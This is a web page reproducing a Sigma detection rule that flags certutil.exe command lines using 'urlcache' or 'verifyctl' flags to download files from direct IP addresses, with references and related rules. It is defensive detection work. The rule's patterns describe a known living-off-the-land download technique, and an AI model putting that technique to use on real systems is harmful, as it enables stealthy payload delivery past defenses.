Suspicious File Downloaded From Direct IP Via Certutil.EXE
Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs.
Sigma rule (View on GitHub)
1title: Suspicious File Downloaded From Direct IP Via Certutil.EXE
2id: 13e6fe51-d478-4c7e-b0f2-6da9b400a829
3related:
4 - id: 19b08b1c-861d-4e75-a1ef-ea0c1baf202b # Direct IP download
5 type: similar
6 - id: 42a5f1e7-9603-4f6d-97ae-3f37d130d794 # File sharing download
7 type: similar
8status: experimental
9description: Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs.
10references:
11 - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil
12 - https://forensicitguy.github.io/agenttesla-vba-certutil-download/
13 - https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/
14 - https://twitter.com/egre55/status/1087685529016193025
15 - https://lolbas-project.github.io/lolbas/Binaries/Certutil/
16 - https://twitter.com/_JohnHammond/status/1708910264261980634
17author: Nasreddine Bencherchali (Nextron Systems)
18date: 2023/02/15
19tags:
20 - attack.defense_evasion
21 - attack.t1027
22logsource:
23 category: process_creation
24 product: windows
25detection:
26 selection_img:
27 - Image|endswith: '\certutil.exe'
28 - OriginalFileName: 'CertUtil.exe'
29 selection_flags:
30 CommandLine|contains:
31 - 'urlcache '
32 - 'verifyctl '
33 selection_http:
34 CommandLine|contains:
35 - '://1'
36 - '://2'
37 - '://3'
38 - '://4'
39 - '://5'
40 - '://6'
41 - '://7'
42 - '://8'
43 - '://9'
44 # filter_local_ips:
45 # # Note: Uncomment this filter if you want to exclude local IPs
46 # CommandLine|contains:
47 # - '://10.' # 10.0.0.0/8
48 # - '://192.168.' # 192.168.0.0/16
49 # - '://172.16.' # 172.16.0.0/12
50 # - '://172.17.'
51 # - '://172.18.'
52 # - '://172.19.'
53 # - '://172.20.'
54 # - '://172.21.'
55 # - '://172.22.'
56 # - '://172.23.'
57 # - '://172.24.'
58 # - '://172.25.'
59 # - '://172.26.'
60 # - '://172.27.'
61 # - '://172.28.'
62 # - '://172.29.'
63 # - '://172.30.'
64 # - '://172.31.'
65 # - '://127.' # 127.0.0.0/8
66 # - '://169.254.' # 169.254.0.0/16
67 filter_main_seven_zip:
68 CommandLine|contains: '://7-' # For https://7-zip.org/
69 condition: all of selection_* and not 1 of filter_main_*
70falsepositives:
71 - Unknown
72level: high
References
Related rules
- ConvertTo-SecureString Cmdlet Usage Via CommandLine
- Invoke-Obfuscation CLIP+ Launcher
- Invoke-Obfuscation CLIP+ Launcher - PowerShell
- Invoke-Obfuscation CLIP+ Launcher - PowerShell Module
- Invoke-Obfuscation CLIP+ Launcher - Security